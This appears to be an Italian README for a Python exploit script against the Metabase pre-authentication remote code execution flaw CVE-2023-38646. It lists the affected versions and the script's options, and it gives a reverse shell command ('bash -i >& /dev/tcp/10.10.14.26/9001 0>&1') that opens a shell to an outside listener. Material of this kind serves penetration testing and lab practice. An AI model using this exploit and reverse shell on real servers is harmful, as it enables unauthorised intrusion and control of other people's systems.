
Script di exploit per RCE pre-autenticazione in Metabase (CVE-2023-38646)
Questo è uno script Python che sfrutta la vulnerabilità di esecuzione di codice remoto del software di login di Metabase. Permette di eseguire comandi arbitrari sul server prima dell'autenticazione.
Le versioni vulnerabili sono Metabase open source precedenti alla 0.46.6.1 e Metabase Enterprise precedenti alla 1.46.6.1
python3 exploit.py -u URL -t TOKEN -c COMMAND
-h, --help mostra questo messaggio di aiuto ed esci
-u URL, --url URL URL del target
-t TOKEN, --token TOKEN
Token di configurazione trovato in /api/session/properties
-c COMMAND, --command COMMAND
Comando da eseguire sul sistema target

Comando usato: bash -i >& /dev/tcp/10.10.14.26/9001 0>&1
Collegare le vulnerabilità per ottenere RCE pre-autenticazione in Metabase (CVE-2023-38646)